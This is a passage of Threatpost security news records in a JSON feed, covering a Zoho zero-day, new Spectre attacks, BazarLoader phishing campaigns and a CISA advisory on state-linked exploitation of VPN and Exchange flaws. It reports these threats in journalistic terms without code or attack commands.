otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/?utm_source=rss&utm_medium=rss&utm_campaign=critical-zoho-zero-day-flaw-disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-21T15:41:00", "description": "Few could have anticipated the impact COVID-19 has had on business. It spread from an isolated outbreak to a global pandemic seemingly overnight, and IT leaders across the planet have had mixed success adjusting to the changes and uncertainty it has brought.\n\nWhile COVID-19 caught many businesses off guard, smart executives are already thinking about the next global crisis and what challenges it might present for IT security.\n\n## **Climate Change: A Looming Crisis**\n\nIt\u2019s a good bet that climate change could bring forth the sequel to COVID-19. [Global climate change is once again the top threat globally according to Pew Research](<https://www.pewresearch.org/global/2019/02/10/climate-change-still-seen-as-the-top-global-threat-but-cyberattacks-a-rising-concern/>) (not surprisingly, cyberattacks are a close second), and it typically occupies top rankings on similar doomsday lists. The World Economic Forum did not include pandemic or contagious disease on its 2019 list of Top 10 Global Risks By Likelihood, but [climate change dominated the top three](<https://www.weforum.org/reports/the-global-risks-report-2020>) \u2014 extreme weather events, failure of climate-change mitigation and adaptation, and major natural disasters like earthquakes or volcanoes.\n\nClimate change is particularly problematic for IT because it affects confidentiality, integrity and availability \u2014 the three pillars of information security \u2014 and requires a holistic strategy.\n\nAvailability is threatened by the physical nature of climate change that forces people away from home or office and the spiraling demand for resources. Confidentiality and integrity become problematic when considering the newest technologies that organizations are implementing as part of digital transformation. Security concerns should be a leading factor when considering and deploying new technology solutions.\n\n## **Pandemic Provides Sound Guidance for the Next Crisis**\n\nWe\u2019re all still learning the lessons of COVID-19, and going forward they must be held closely, as many potential climate-change outcomes could mirror what we\u2019ve experienced since March 2020. Wildfires or flooding from supersized or rare storms, [events that have intensified in recent years](<https://www.cnet.com/how-to/deadly-fires-hurricanes-floods-heres-why-the-situation-is-getting-worse/>), would bring mass evacuations and services disruptions that drive employees to work from home and businesses to establish secure connections in order to maintain productivity.\n\nWorking from home and increased cloud adoption pose challenges and risks that must be faced proactively. Since fixed locations and the legacy hardware they\u2019re connected to are increasingly vulnerable, a user-centric approach to security infrastructure, like a software-defined network, is required.\n\nThere is increasing chatter around the importance of data backup in 2021, and how automated backup and disaster recovery (BDR) will be an emerging mission-critical component of data security. Considering how working from home figures to continue driving the emergence of both multi-cloud and disaster recovery as-a-service (DRaaS) ([expected to grow at 41.6 percent CAGR through 2027](<https://www.xaasjournal.com/4-bdr-trends-for-2021/>)), it\u2019s safe to say most organizations will be focused on BDR.\n\n## **Expect the Worst Intentions of Bad Actors**\n\nSimilarly, COVID-19 has given us a window into how hackers can exploit human vulnerabilities during a crisis, with [healthcare and pandemic-related attacks prevalent in 2020](<https://threatpost.com/covid-19-vaccine-cyberattacks-credentials-zebrocy/162072/>). For example, phishing emails are designed to play on emotions, so it\u2019s not surprising that the words COVID, CORONAVIRUS, masks, test, quarantine, and vaccine [appeared widely in phishing emails](<https://threatpost.com/covid-19-vaccine-spear-phishing-attacks/164489/>) this year.\n\nA climate change-related crisis with widespread disruptions would likely provide bad actors similarly ideal conditions for deception. During the first weeks of shelter-in-place for many U.S. states last March, [almost three times as many people clicked on a phishing link and provided their credentials](<https://www.intelligentciso.com/2020/09/10/what-impact-has-covd-19-had-on-the-data-breach-landscape/>) to a simulated login page than in pre-COVID-19 phishing simulations conducted the previous year. Taking advantage of this heightened emotional response is how opportunistic hackers succeed.\n\nThis tells us that zero-trust identity and managed security solutions, can help organizations be ready for any situation that would test their workers\u2019 vulnerabilities. The added layer of employee training and awareness could include [proven methods of phishing prevention](<https://insights.sei.cmu.edu/insider-threat/2020/01/anti-phishing-training-is-it-working-is-it-worth-it.html>) that can dramatically reduce user click rates.\n\n## **Infrastructure Will Force Companies to Look Inward**\n\nThe internet and climate change are intertwined in an anxiety-producing plot \u2014 the internet is at once a cause of climate change and one of its potential casualties.\n\nInternet-of-things (IoT) devices, which are still largely unregulated, continue to see widespread adoption, and companies are now coming online with IoT-enabled smart factories and offices running entirely on automation. Existing operational technology (OT) networks that run most of our critical infrastructure are old and difficult to truly secure, so any disruption to the internet brought by climate change, or any related cyberattacks, must be accounted for in security planning. With IoT specifically, endpoint security must be addressed.\n\nIt\u2019s difficult to envision any company\u2019s plan that does not seriously take into account its own environmental footprint. Increasingly, governments are applying more stringent standards for energy efficiency around data centers, storage and networking. This kind of effort ultimately requires global, industry-wide and company-wide cooperation, and organizations who buy in first will position themselves for success in the face of adversity.\n\n## **True Resiliency Requires Vendor Independence**\n\nA climate change-related crisis would likely impact an organization\u2019s systems in some way. That company\u2019s vendors would be similarly impacted and possibly unable to provide service. More than anything, climate change will require companies to improve independency so they are not so reliant on existing legacy technology or other service providers for data, security or infrastructure.\n\nCompanies must meaningfully invest in disaster recovery and business continuity, and comprehensively assess all third-party risks in order to ensure independency. This effort also requires investment in new, scalable and integrated platforms to replace legacy architecture.\n\nIt might be impossible to plan for the next global crisis. But if COVID-19 has taught us anything, it\u2019s that transformative change is possible even in the most trying circumstances. Taking threats like these seriously and making a plan is the first step to ensuring resiliency when the world changes on a dime.\n\n**_Sivan Tehila is cybersecurity strategist at Perimeter 81 and an adjunct professor of cybersecurity at Yeshiva University._**\n\n_**Enjoy additional insights from Threatpost\u2019s InfoSec Insider community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "cvss3": {}, "published": "2021-04-19T15:27:38", "type": "threatpost", "title": "What COVID-19 Taught Us: Prepping Cybersecurity for the Next Crisis", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-19T15:27:38", "id": "THREATPOST:16A4E4FD8C0D84305D5ABABEBBC6343E", "href": "https://threatpost.com/covid-19-prepping-cybersecurity-crisis/165472/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-05-05T13:59:21", "description": "All defenses against Spectre side-channel attacks can now be considered broken, leaving billions of computers and other devices just as vulnerable today as they were when the hardware flaw was [first announced](<https://threatpost.com/intel-halts-spectre-meltdown-patching-for-broadwell-and-haswell-systems/129615/>) three years ago.\n\nA [paper](<http://www.cs.virginia.edu/~av6ds/papers/isca2021a.pdf>) published on Friday by a team of computer scientists from the University of Virginia and the University of California, San Diego, describes how all modern AMD and Intel chips with micro-op caches are vulnerable to this new line of attack, given that it breaks all defenses. That includes all Intel chips that have been manufactured since 2011, which all contain micro-op caches.\n\nThe vulnerability in question is called Spectre because it\u2019s built into modern processors that perform branch prediction. It\u2019s a technique that makes modern chips as speedy as they are by performing what\u2019s called \u201cspeculative execution,\u201d where the processor predicts instructions it might end up executing and prepares by following the predicted path to pull the instructions out of memory. If the processor stumbles down the wrong path, the technique can leave traces that may make private data detectable to attackers. One example is when data accesses memory: if the speculative execution relies on private data, the data cache gets turned into a side channel that can be squeezed for the private data through use of a [timing attack](<https://threatpost.com/intel-side-channel-attack-data/164582/>). \n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe new line of attacks exploits the micro-op cache: an on-chip structure that speeds up computing by storing simple commands and allowing the processor to fetch them quickly and early in the speculative execution process, as the team explains in a [writeup](<https://engineering.virginia.edu/news/2021/04/defenseless-uva-engineering-computer-scientists-discover-vulnerability-affecting>) from the University of Virginia. Even though the processor quickly realizes its mistake and does a U-turn to go down the right path, attackers can get at the private data while the processor is still heading in the wrong direction. \n\nOm Moolchandani, co-founder, CTO, CISO and research team leader at Accurics, said that this is going to be a widespread problem. \u201cAny x86 type multi-core processor could be affected: essentially all modern 32- and 64-bit PC processors and the vast majority of typical server hardware,\u201d he told Threatpost in an email on Monday. Non-x86 processors such as ARM, MIPS, and RISC V, etc. aren\u2019t expected to be affected.\n\n## **Back to the Drawing Board**\n\nThe findings are going to obliterate a pile of work done by those who\u2019ve been working hard to fix Spectre, the team says. \u201cSince Spectre was discovered, the world\u2019s most talented computer scientists from industry and academia have worked on software patches and hardware defenses, confident they\u2019ve been able to protect the most vulnerable points in the speculative execution process without slowing down computing speeds too much. They will have to go back to the drawing board,\u201d according to UVA\u2019s writeup. \n\nThe new lines of attack demolish current defenses because they only protect the processor in a later stage of speculative execution. The team was led by UVA Engineering Assistant Professor of Computer Science Ashish Venkat, who picked apart Intel\u2019s suggested defense against Spectre, which is called [LFENCE](<https://software.intel.com/security-software-guidance/best-practices/optimized-mitigation-approach-load-value-injection>). That defense tucks sensitive code into a waiting area until the security checks are executed, and only then is the sensitive code allowed to execute, he explained. \u201cBut it turns out the walls of this waiting area have ears, which our attack exploits. We show how an attacker can smuggle secrets through the micro-op cache by using it as a covert channel.\u201d\n\n## **Kiss That Precious Performance Goodbye**\n\nVenkat says we can think about the potential attacks as being something like \u201ca hypothetical airport security scenario where TSA lets you in without checking your boarding pass because (1) it is fast and efficient, and (2) you will be checked for your boarding pass at the gate anyway. \n\n\u201cA computer processor does something similar. It predicts that the check will pass and could let instructions into the pipeline. Ultimately, if the prediction is incorrect, it will throw those instructions out of the pipeline, but this might be too late because those instructions could leave side-effects while waiting in the pipeline that an attacker could later exploit to infer secrets such as a password,\u201d Venkat said. \n\nAccording to team member UVA Ph.D. student Logan Moody, the new attacks are going to pour cement shoes onto the feet of modern chips. \u201cIn the case of the previous Spectre attacks, developers have come up with a relatively easy way to prevent any sort of attack without a major performance penalty for computing,\u201d Moody said. \u201cThe difference with this attack is you take a much greater performance penalty than those previous attacks.\u201d\n\nMoolchandani described the performance drag like this: \u201cThe affected parts of the computer focus specifically on improving performance by reading information from relatively slow components such as external memory in anticipation of what will be needed. This so-called speculative execution cache greatly improves performance by ensuring that data is available when it\u2019s needed, similar to the effect of an assembly line in manufacturing. The vulnerability is in the mechanics of how that assembly line works, and any patch will necessarily affect the efficiency of that process. We intuitively know it will reduce performance, and any performance impact will be magnified because it is buried so deep in the inner workings of the processor.\u201d\n\n## **How Likely Are Attacks?**\n\nMoolchandani told Threatpost that as far as the direct impact of attacks on organizations, end-users and consumers go, the worry will concern attackers\u2019 ability to dig secrets out of the nooks and crannies of processors \u201cIt would be very difficult to create a focused attack looking for specific information,\u201d he said in an email. \u201cInstead, attacks are expected to take the form of passive surveillance, collecting random information. That information is collected from deep inside the processor, though, and could contain anything processed by the computer.\u201d \n\nGiven the structure of chips and this newly discovered flaw, even encryption won\u2019t save our data, he said.\n\n\u201cBecause of the way it\u2019s gathered, encrypted information is not safe from attacks \u2013 it can be collected by criminals after decryption has taken place,\u201d Moolchandani said. \u201cThey could even access arbitrary data stored on the hard drive which hasn\u2019t been accessed in a very long time. While they cannot control what information they might be able to see, attackers can still target specific organizations or domains to increase the chance of finding interesting information, for example, large e-commerce sites which process payment data, or government-aligned organizations which might process classified information, etc.\u201d\n\nThe research team reported their findings to international chip makers in April and plan to present at the International Symposium on Computer Architecturem, [ISCA](<https://iscaconf.org/isca2021/>), which will be held virtually in June.\n\n5/3/21 16:11 UPDATE 1: Intel emailed the following statement to Threatpost: \u201cIntel reviewed the report and informed researchers that existing mitigations were not being bypassed and that this scenario is addressed in our [secure coding guidance](<https://software.intel.com/security-software-guidance/secure-coding/guidelines-mitigating-timing-side-channels-against-cryptographic-implementations>). Software following our guidance already have protections against incidental channels including the uop cache incidental channel. No new mitigations or guidance are needed.\u201d\n\n5/3/21 22:47 UPDATE 2: Expect this to be a heated, if virtual, debate at ISCA. After Intel sent out its statement, UVA\u2019s Venkat responded with this emailed response: \u201cWe\u2019re aware of these guidelines from Intel suggesting that software developers \u2026 write code in a way that is not vulnerable to side-channel attacks. Here\u2019s an excerpt from the Intel article: \u2018Developers who wish to protect secret data against timing side-channel methods should ensure that their code runtime, data access patterns, and code access patterns are identical independent of secret values.\u2019\n\n\u201cCertainly, we agree that software needs to be more secure, and we agree as a community that constant-time programming is an effective means to writing code that is invulnerable to side-channel attacks. However, the vulnerability we uncover is in hardware, and it is important to also design processors that are secure and resilient against these attacks.\n\n\u201cIn addition, constant-time programming is not only hard in terms of the actual programmer effort, but also entails high performance overhead and significant deployment challenges related to patching all sensitive software. The percentage of code that is written using Constant Time principles is in fact quite small. Relying on this would be dangerous. That is why we still need to secure the hardware.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook, _\u201c_[_2021: The Evolution of Ransomware_](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)_,\u201d_ to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and[ DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-05-03T20:56:03", "type": "threatpost", "title": "New Attacks Slaughter All Spectre Defenses", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-03T20:56:03", "id": "THREATPOST:905F5C5FE38CC3228FF94F798221B3D5", "href": "https://threatpost.com/attacks-slaughter-spectre-defenses/165809/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-21T15:41:03", "description": "Ransomware has been a growing scourge for years, but recent attacks illustrate a growing sophistication by attackers within this slice of the cybercrime underbelly. Snowballing assaults against the business sector, schools and government organizations are now a primary cybersecurity concern. Making matters worse, is the ever-changing nature of ransomware attacks, complicating the cyber-defender\u2019s job.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nFor instance, the last 12 months has seen emerging types of extortion attempts on the part of ransomware operators. [Double-extortion efforts](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) pioneered by cyberattack groups like Maze have become standard operating procedure (stealing sensitive data and threatening to release it if a victim doesn\u2019t pay up). But beyond this, some ransomware operators, such as the [SunCrypt gang](<https://threatpost.com/revil-video-game-hit-revenue/160743/>), are mounting follow-on denial-of-service (DoS) attacks to put the screws to victims. And, other gangs are using the data they steal to mount additional attacks on the initial victim\u2019s partners or suppliers, as seen in the [Blackbaud attack](<https://gurucul.com/news/making-sense-of-the-blackbaud-ransomware-attack>).\n\nThere\u2019s also a burgeoning move [to attack cloud resources](<https://threatpost.com/cybercrime-cloud-accelerate-attacks-data-glut/161243/>) such as Kubernetes and Docker, which opens up a new threat surface and area of risk for IT security teams.\n\nKeeping up with ransomware changes can be overwhelming. To that end, Threatpost hopes to lend context, in-depth insights and mitigation examples with a fresh eBook to arm infosec professionals with knowledge needed to defend against not only the state of play \u2013 but also the emerging trends and attack patterns (such as those above) that are set to bubble up and take security staff by surprise in the year ahead.\n\nIn \u201c2021: The Evolution of Ransomware,\u201d a [free, downloadable PDF eBook](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>), a series of in-depth feature articles explores this multifaceted threat and what\u2019s next. It kicks off with our lead story that goes beyond the ransomware status quo, and explores top emerging trends and granular insights like how ransomware code itself is changing.\n\n**_Inside This eBook:_**\n\n * Emerging Trends in Ransomware\n * A Peek Inside the Ransomware Economy\n * Cyber-Insurance Fuels Ransomware Payment Surge\n * Threatpost Poll: The Cost of a Ransomware Attack\n * Diary of a 48-Hour Ransomware Attack\n * A Practical Guide to Avoiding Ransomware\n\nWe also take a deep dive into how the [ransomware underground economy](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>) is structured and what goes on in illicit forums. Threatpost follows the money to find out how these affiliates work with ransomware operators, their code of conduct and more.\n\nInside this eBook, Threatpost also delivers an insider\u2019s view into the real-world toll that ransomware can take. An exclusive case study takes readers inside a fascinating incident-response event, with a diary of the first 48 hours of an attack on a [school district](<https://threatpost.com/pysa-ransomware-education-feds-warn/164832/>).\n\nOther articles include exclusive Threatpost research (based on [a reader poll](<https://threatpost.com/threatpost-poll-ransomware-security/162842/>)) that examines attitudes towards paying the ransom, how respondents said they deal with a ransomware attack and what organizations\u2019 top challenges are. We also take a critical look at the [role of cyberinsurance companies](<https://threatpost.com/mixed-sanctions-ransomware-negotiators/159795/>) when it comes to ransomware. Lastly, Threatpost offers a round-up of best practices for mitigating risk with an at-a-glance checklist for shoring up defenses.\n\nThreatpost is releasing this eBook at a time of unprecedented growth for this type of cyberattack. The number of ransomware attacks has jumped by 350 percent since 2018, the average ransom payment increased by more than 100 percent in 2020, downtime is up by 200 percent and the average cost per incident is on the rise, according to a [recent report](<https://purplesec.us/resources/cyber-security-statistics/ransomware/>) from PurpleSec.\n\nWorryingly, in a recent survey from Proofpoint, 75 percent of respondents said they have experienced a ransomware attack; victims also reported that ransom demand amounts [are up 320 percent](<https://threatpost.com/ransomware-demands-spike-payments-rise/163744/>) so far this year compared to 2020.\n\nBusinesses need to view ransomware as a future event to plan for, not a hypothetical abstract. Cloud services, remote workers and a reliance on connected devices [put any business at risk](<https://threatpost.com/ransomware-cheese-shortages-netherlands/165407/>) for a ransomware incident.\n\nThe polymorphic nature of ransomware crimes plays out in multiple dimensions, and paying attention to those developing trends is vital. [Download this free Threatpost eBook today](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>), to help hone a solid foundation for understanding this threat, and how to be better positioned to defend against it \u2013 both now and in the future.\n\n**Download our exclusive ****FREE Threatpost Insider eBook****,** _**\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d**_** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and ****[DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now**** \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-19T18:01:23", "type": "threatpost", "title": "Ransomware: A Deep Dive into 2021 Emerging Cyber-Risks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-19T18:01:23", "id": "THREATPOST:F084C5D91E4F66092F5449922C34C4CE", "href": "https://threatpost.com/ebook-2021-ransomware-emerging-risks/165477/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-21T15:43:53", "description": "The BazarLoader malware is leveraging worker trust in collaboration tools like Slack and BaseCamp, in email messages with links to malware payloads, researchers said.\n\nAnd in a secondary campaign aimed at consumers, the attackers have added a voice-call element to the attack chain.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe [BazarLoader downloader](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>), written in C++, has the primary function of downloading and executing additional modules. BazarLoader was first observed in the wild last April \u2013 and since then researchers have observed at least six variants, \u201csignaling active and continued development.\u201d\n\nIt\u2019s been recently seen being used as a staging malware for ransomware, [particularly Ryuk](<https://threatpost.com/ransomware-french-it-giant/160484/>).\n\n\u201cWith a focus on targets in large enterprises, BazarLoader could potentially be used to mount a subsequent ransomware attack,\u201d according to an advisory from Sophos, [issued on Thursday](<https://news.sophos.com/en-us/2021/04/15/bazarloader/>).\n\n## **Cyberattackers Abuse Slack and BaseCamp **\n\nAccording to researchers at Sophos, in the first campaign spotted, adversaries are targeting employees of large organizations with emails that purport to offer important information related to contracts, customer service, invoices or payroll.\n\n\u201cOne spam sample even attempted to disguise itself as a notification that the employee had been laid off from their job,\u201d according to Sophos.\n\nThe links inside the emails are hosted on Slack or BaseCamp cloud storage, meaning that they could appear to be legitimate if a target works at an organization that uses one of those platforms. In an [era of remote working](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>), those odds are good that this is the case.\n\n\u201cThe attackers prominently displayed the URL pointing to one of these well-known legitimate websites in the body of the document, lending it a veneer of credibility,\u201d researchers said. \u201cThe URL might then be further obfuscated through the use of a URL shortening service, to make it less obvious the link points to a file with an .EXE extension.\u201d\n\nIf a target clicks on the link, BazarLoader downloads and executes on the victim\u2019s machine. The links typically point directly to a digitally signed executable with an Adobe PDF graphic as its icon. The files usually perpetuate the ruse, with names like presentation-document.exe, preview-document-[number].exe or annualreport.exe, researchers noted.\n\nThese executable files, when run, inject a DLL payload into a legitimate process, such as the Windows command shell, cmd.exe.\n\n\u201cThe malware, only running in memory, cannot be detected by an endpoint protection tool\u2019s scans of the filesystem, as it never gets written to the filesystem,\u201d explained researchers. \u201cThe files themselves don\u2019t even use a legitimate .DLL file suffix because Windows doesn\u2019t seem to care that they have one; The OS runs the files regardless.\u201d\n\n## **\u2018BazarCall\u2019 Campaign**\n\nIn the second campaign, Sophos found that the spam messages are devoid of anything suspicious: There\u2019s no personal information of any kind included in the body of the email, no link and no file attachment.\n\n\u201cAll the message claims is that a free trial for an online service the recipient purportedly is currently using will expire in the following day or two, and embeds a telephone number the recipient needs to call in order to opt-out of an expensive, paid renewal,\u201d researchers explained.\n\nIf a target decides to pick up the phone, a friendly person on the other side gives them a website address where the soon-to-be-victim could supposedly unsubscribe from the service.\n\n\u201cThe well-designed and professional looking websites bury an unsubscribe button in a page of frequently asked questions,\u201d according to Sophos. \u201cClicking that button delivers a malicious Office document (either a Word doc or an Excel spreadsheet) that, when opened, infects the computer with the same BazarLoader malware.\u201d\n\nThe messages initially claimed to originate from a company called Medical Reminder Service, and include a telephone number in the message body, as well as a street address for a real office building located in Los Angeles. But in mid-April, the messages adopted a lure involving a fake paid online lending library, called BookPoint.\n\nThe subject lines revolving around BookPoint also reference a long number or code, which users are asked to input in order to \u201cunsubscribe.\u201d\n\nIn terms of the infection routine, the attackers in these so-called \u201cBazarCall\u201d campaigns deliver weaponized Microsoft Office documents that invoke commands to drop and execute one or more payload DLLs.\n\n## **Connection to Trickbot?**\n\nResearchers have been suspecting that BazarLoader could be related or authored by the TrickBot operators. TrickBot is another first-stage loader malware often used in ransomware campaigns.\n\nSophos looked into the connection and found that the two malwares use some of the same infrastructure for command and control.\n\n\u201cFrom what we could tell, the [BazarLoader] malware binaries running in the lab network bear no resemblance to TrickBot,\u201d according to the posting. \u201cBut they did communicate with an IP address that has been used in common, historically, by both malware families. Of course, a lot of people have [studied this connection in the past](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>).\u201d\n\nIn any event, BazarLoader appears to be in an early stage of development and isn\u2019t as sophisticated as more mature families like TrickBot, researchers added.\n\nFor instance, \u201cwhile early versions of the malware were not obfuscated, more recent samples appear to encrypt the strings that might reveal the malware\u2019s intended use,\u201d they said.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T20:27:25", "type": "threatpost", "title": "BazarLoader Malware Abuses Slack, BaseCamp Clouds", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-16T20:27:25", "id": "THREATPOST:354BF51EC880C48C85D9302EDB1227D6", "href": "https://threatpost.com/bazarloader-malware-slack-basecamp/165455/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat 